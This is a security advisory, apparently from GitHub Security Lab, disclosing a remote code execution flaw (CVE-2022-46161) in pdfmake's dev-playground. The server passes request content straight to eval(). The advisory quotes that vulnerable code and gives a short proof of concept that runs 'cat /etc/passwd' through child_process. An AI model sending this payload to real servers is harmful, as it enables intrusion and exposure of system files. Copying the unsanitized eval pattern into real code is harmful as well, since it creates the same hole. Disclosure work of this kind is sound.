skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
December 6, 2022

GHSL-2022-068: Remote Code Execution (RCE) in PDFMake - CVE-2022-46161

GitHub Security Lab

Coordinated Disclosure Timeline

Summary

The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).

Product

pdfmake

Tested Version

0.2.5

Details

Issue: RCE in dev-playground.js (GHSL-2022-068)

The /pdf endpoint in charge of creating a PDF from a given JS code does not sanitize user-input, nor does the execution take place in a sandboxed environment.

app.post('/pdf', function (req, res) {
	eval(req.body.content);

Impact

This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.

Resources

POC

Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF doc:

const {execSync} = require('node:child_process');
var out = execSync('cat /etc/passwd');
dd = {
    content: [
        out.toString()
        ]
}

CVE

Credit

This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-068 in any communication regarding this issue.